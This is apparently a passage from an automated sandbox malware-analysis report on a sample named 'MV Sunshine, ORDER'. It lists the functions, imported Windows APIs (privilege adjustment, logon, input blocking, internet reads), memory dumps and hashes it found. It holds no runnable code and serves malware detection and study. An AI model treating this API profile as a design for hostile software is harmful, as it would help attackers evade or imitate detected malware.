Instruction ID: 0104a4ca09ff11506ae749c8e53fea699af177f8152c0569b14382663ebdc965
Opcode Fuzzy Hash: 663b20538433731f71b525e92ade84ef0084eed1476ff8b158b82957c0d5a75b
Instruction Fuzzy Hash: EC11A775D0122C7AD7309BA5AC4DFABBB7CEF45760F1046AAF908E7180D6744E818BA4

Function 009DEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009DEB19

Strings

|, xrefs: 009DEB49
(, xrefs: 009DEB5F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: d610d445a39e41849f4ca65367ee7934a2f600851b9ffec40288d7eb0a255a64
Instruction ID: b8b5d2025d85aa2e28895f2c95aa8c5e3771d4b9746324bfcb5dc262642d6049
Opcode Fuzzy Hash: d610d445a39e41849f4ca65367ee7934a2f600851b9ffec40288d7eb0a255a64
Instruction Fuzzy Hash: 08323575A407059FDB28DF29C481A6AB7F1FF48320B15C56EE89ADB3A1E770E941CB40

Function 009F25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 009F26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009F270C

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 719dff584c90775f98560c7105f725afef3aaaa0a84b070d49105100b30e769d
Instruction ID: 3bd46953162d0bd3411a6d1e061f44a20c848f59a1eb75e72aa39316c336f943
Opcode Fuzzy Hash: 719dff584c90775f98560c7105f725afef3aaaa0a84b070d49105100b30e769d
Instruction Fuzzy Hash: EB41D37160420DBFEB20EB94CC85FBBB7BCEB80728F10406AF701E6140EA75AE419765

Function 009EB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009EB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009EB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009EB655

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 73bc163bce1a3ad98b3a17268bc2e32b3327488f5923716cdfed91d5115b3d1a
Instruction ID: 5a5dd964424dad280da5958f06136bdb17229ae1bb118acb97db51363cc22510
Opcode Fuzzy Hash: 73bc163bce1a3ad98b3a17268bc2e32b3327488f5923716cdfed91d5115b3d1a
Instruction Fuzzy Hash: EC214435A00518EFCB00EF95D884EEDBBB8FF88310F1480A9E945AB351DB319956CB51

Function 009D8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 009A0FF6: std::exception::exception.LIBCMT ref: 009A102C
Part of subcall function 009A0FF6: __CxxThrowException@8.LIBCMT ref: 009A1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D8D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8D3A
GetLastError.KERNEL32 ref: 009D8D47

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 25339beacf21fcbb7f9c3a10d113659566a0fabfddd0a8ee70f7ad55779dba73
Instruction ID: 7fc48c2ce2b036eca6c8a2e6c21b747146adb2582fbe7d8a5f333c550507ce7c
Opcode Fuzzy Hash: 25339beacf21fcbb7f9c3a10d113659566a0fabfddd0a8ee70f7ad55779dba73
Instruction Fuzzy Hash: CD1191B1414209AFE728DF64DC85D6BB7BDFB44710B20C52EF85697681EB70BC418A60

Function 009E4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009E4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009E4C43
FreeSid.ADVAPI32(?), ref: 009E4C53

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
Instruction ID: bfa0f21396ad8fa2762e787c5121134bd7c502bcbc1f01ceebb83e242e55e955
Opcode Fuzzy Hash: 487bd709ac0ea3c344561aa5752015bc4b567ad4a1b5808502e746b4ed37bf78
Instruction Fuzzy Hash: 3AF04975E1130CBFDF04DFF0DC89AAEBBBCEF08301F1044A9A901E2581E6746A058B50

Function 0098E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f267808eeb95326b328a855d7ab098d044e85a3c9a2d2a5740aabc148c20cd90
Instruction ID: 52e2d203d34e8d0c379859bacc4791c82aba8ab6acbce01c01ed4800e90239d7
Opcode Fuzzy Hash: f267808eeb95326b328a855d7ab098d044e85a3c9a2d2a5740aabc148c20cd90
Instruction Fuzzy Hash: 7C22AD74A04216CFDB24EF64C4A4BBEB7B4FF49300F14846AE856AB351E774AD81CB91

Function 009EC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009EC966
FindClose.KERNEL32(00000000), ref: 009EC996

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7bac932e897286b9aa4ea0ea135a3c916f27c3923348c28c81cdf64e177ba757
Instruction ID: f524e1c74e5d03554b4b58e19a593cec2ab3d4795298ab99a1f389660a48bb3b
Opcode Fuzzy Hash: 7bac932e897286b9aa4ea0ea135a3c916f27c3923348c28c81cdf64e177ba757
Instruction Fuzzy Hash: 241161726106049FD710EF69D845A2AF7E9FF84324F04891EF9AADB391DB34AC01CB81

Function 009EA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009F977D,?,00A0FB84,?), ref: 009EA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009F977D,?,00A0FB84,?), ref: 009EA314

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 43f54312be4d691adfa5e9e5a0112682554cd33ef5429a1abbb591f3b379c78b
Instruction ID: 8cbf28cea3e2ae78b9a1cac7032e725155d50d8ba28fcd504f9169c714098955
Opcode Fuzzy Hash: 43f54312be4d691adfa5e9e5a0112682554cd33ef5429a1abbb591f3b379c78b
Instruction Fuzzy Hash: F8F0E23110422DEBDB21AFA4CC48FEA736CBF08361F004166B908D6190D630A901CBA1

Function 009D8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8851), ref: 009D8728
CloseHandle.KERNEL32(?,?,009D8851), ref: 009D873A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a120b3874daa18ec23b68821283047ce7b9ba98f6c2747e41c9f08bc83aa0b57
Instruction ID: 2a05beec388fd2103e6180379cd5c7b5405478d86724b1b26b847e2ec2e735fb
Opcode Fuzzy Hash: a120b3874daa18ec23b68821283047ce7b9ba98f6c2747e41c9f08bc83aa0b57
Instruction Fuzzy Hash: 69E0E675010610EFE7352B60EC09E7777EDEF44750B15843DF46680471DB615C91DB50

Function 009AA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,009A8F97,?,?,?,00000001), ref: 009AA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009AA3A3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
Instruction ID: 852d44631e73d4298108308c162102ad6177f869357cd873c91dcda56cc03cc3
Opcode Fuzzy Hash: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
Instruction Fuzzy Hash: EBB0923105820CAFCA106BD1EC09B883F68EB45BB2F404020F61D98860CB6254538A92

Function 009AF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
Instruction ID: 7ab85ac9a1aea043d1eef3fcd3af40d8ab205bc1708a04a71d76dcd04888fd2b
Opcode Fuzzy Hash: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
Instruction Fuzzy Hash: 98323422D6DF014DD7239674D83237AA26DAFB73D4F15E737E81AB59A6EB28C4830140

Function 009B267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
Instruction ID: 16a151fa4713de5ffad584941deb715f688860786618e745ae6c237ee82781c4
Opcode Fuzzy Hash: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
Instruction Fuzzy Hash: E0B10F20E2AF514DD32396798831336FA5CAFBB2E5F92D71BFC2674D22EB2185834141

Function 009E8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 009E8B25

Part of subcall function 009A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009E91F8,00000000,?,?,?,?,009E93A9,00000000,?), ref: 009A5443
Part of subcall function 009A543A: __aulldiv.LIBCMT ref: 009A5463

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 52c2545d68c39a00fde8431f491abff7d13bd351fa8cc447798ca79ae8db94e3
Instruction ID: 1d088ac1816767e19779125d0b86e12c8b505167d8c89b2a373b0d14f91386a3
Opcode Fuzzy Hash: 52c2545d68c39a00fde8431f491abff7d13bd351fa8cc447798ca79ae8db94e3
Instruction Fuzzy Hash: 2D21D2766256508BC329CF69D441B52B3E1EBA5321B288E6CD0E9CF2D0CA75BD05CB94

Function 009F41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 009F4218

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: a821bc4535d92d31eb67f72906ac5cb9dcb24e54921dc67195491d957d09ee40
Instruction ID: 69d07090f02499c109e011851cc89b758b6529c3b1e3756946ff407b95b4df16
Opcode Fuzzy Hash: a821bc4535d92d31eb67f72906ac5cb9dcb24e54921dc67195491d957d09ee40
Instruction Fuzzy Hash: 35E01A312402189FCB10EF99D844AAAB7E8AF94760F048426F94AD7352DA71A8418BA0

Function 009E4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009E4EEC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 6f0799d2eab13cdd08a787a44d5bc69b734a71ebf632bf6f3542ce3250a9c563
Instruction ID: 309e2eddb5e260b04dff408bf15c722d1d1510bfac195e87073967bc01459fa3
Opcode Fuzzy Hash: 6f0799d2eab13cdd08a787a44d5bc69b734a71ebf632bf6f3542ce3250a9c563
Instruction Fuzzy Hash: D6D052A81607883AED2A8B239C5FF77020CF300782FD04AAEB102994C2E8D46C52A030

Function 009D8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009D88D1), ref: 009D8CB3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
Instruction ID: d0fb77535a9992a077eb880b69fa33b4d64eca6e3c0a6bdab008f95fba734f3a
Opcode Fuzzy Hash: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
Instruction Fuzzy Hash: A9D05E3226050EAFEF01CEA4DC01EAF3B69EB04B01F408111FE15D50A1C775D836AB60

Function 009C2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 009C2242

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: cc484ed5840a711c52cf17b0562cae8194b50a82fa9dbc0f46babd213f9f39b9
Instruction ID: f1d906cd1708ad53e940f6dbc887d6de864e3e391ca274348b91976fa05615dd
Opcode Fuzzy Hash: cc484ed5840a711c52cf17b0562cae8194b50a82fa9dbc0f46babd213f9f39b9
Instruction Fuzzy Hash: 9EC04CF1C0010DDBDB15DF90DA88DEE77BCAB04305F104455A101F2101E7749B458E71

Function 009AA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 009AA36A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
Instruction ID: 1ab9c6ae98f72a329442e2f0cd775c7ebba47b5d486f32042c2139192b5e40ba
Opcode Fuzzy Hash: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
Instruction Fuzzy Hash: 3CA0123000410CABCA001B81EC044447F5CD6002A07004020F40C44421873254124581

Function 00998A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec018d918baa029f1486760e42322d41d0d305d3176723065fe4e3669deca5d
Instruction ID: 83caccd8b649f288f01cfe540a09e7e41681840282f77b5a959f4bd6da06a37a
Opcode Fuzzy Hash: 4ec018d918baa029f1486760e42322d41d0d305d3176723065fe4e3669deca5d
Instruction Fuzzy Hash: 10222870505616CBDF288F2CC49467FB7A5EB02340F69886FD8829B691EB39DD81DB60

Function 009A2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
